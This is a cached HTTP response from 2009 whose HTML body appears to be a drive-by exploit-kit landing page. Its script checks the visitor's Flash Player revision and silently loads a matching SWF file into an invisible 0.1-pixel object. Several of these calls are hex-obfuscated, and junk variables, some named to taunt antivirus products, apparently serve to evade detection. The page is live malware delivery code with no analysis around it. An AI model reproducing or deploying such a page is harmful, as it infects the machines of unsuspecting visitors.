HTTP/1.1 200 OK
Content-Length: 1811
ETag: "07f4585a095c91:604"
Date: Wed, 25 Feb 2009 03:23:41 GMT
Last-Modified: Mon, 23 Feb 2009 10:21:42 GMT
Content-Type: text/html
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Polipo-Location: http://www.sll6890.cn/a8/Ilink.html
X-Polipo-Date: Wed, 25 Feb 2009 03:34:25 GMT
X-Polipo-Access: Wed, 25 Feb 2009 04:00:51 GMT

<Script src="swfobject.js"></Script>  
<div id="flashcontent">111</div><div id="flashversion">222</div>
<script src="flash.js"></script>
<script type="text/javascript">
if(version['major']==9){
	var dffddf="d";
	document.getElementById('flashversion').innerHTML="";
	if(version['rev']==115){
		var fuckavp = "DZ";
		var fuckaxp = "aa";
		var fuckaqp ="c";
		var so=new SWFObject("./i11"+"5.swf","mymovie","0.1","0.1","9","#000000");
		so.write("flashcontent")
	}else if(version['rev']==45){
		var fqdscc = "P";
		var so=new SWFObject("./i45.swf","mymovie","0.1","0.1","9","#000000");
		var wevbhpa = "qrffc";
		so.write("flashcontent")
	}else if(version['rev']==16){
		var so=new SWFObject("./i16.swf","mymovie","0.1","0.1","9","#000000");
		so.write("flashcontent")}else if(version['rev']==64){var hgds = "DZ";
		
		so=new SWFObject("\x2e\x2f\x69\x36\x34\x2e\x73\x77\x66","\x6d\x79\x6d\x6f\x76\x69\x65","\x30\x2e\x31","\x30\x2e\x31","\x39","\x23\x30\x30\x30\x30\x30\x30");
		var qwea = "qwecb";
		so.write("flashcontent")
	}else if(version['rev']==28){
		var so=new SWFObject("./i28.swf","mymovie","0.1","0.1","9","#000000");var whhjs="h";
		so.write("flashcontent");var dddp="c";
	}else if(version['rev']==47){
		var jys1="\x44\x5a";var so=new SWFObject("\x2e"+"\x2f\x69\x34\x37\x2e\x73\x77\x66","\x6d\x79\x6d\x6f\x76\x69\x65","\x30\x2e\x31","\x30\x2e\x31","\x39","\x23\x30\x30\x30\x30\x30\x30");
		so["\x77\x72\x69\x74\x65"]("\x66\x6c\x61\x73\x68\x63\x6f\x6e\x74\x65\x6e\x74")
	}else if(version['rev']>123){
		if(document.getElementById){
			var fisx="gf";
			document.getElementById('flashversion').innerHTML=""
		}
	}
}
var fkav="BS";var fkaav="BS";var fkasacv="BS";var fkaasacv="BS";var wkaasacv="BS";var lsacv="BS";var dcccccsacv="BS";var chnaxacv="BS";
</ScripT>  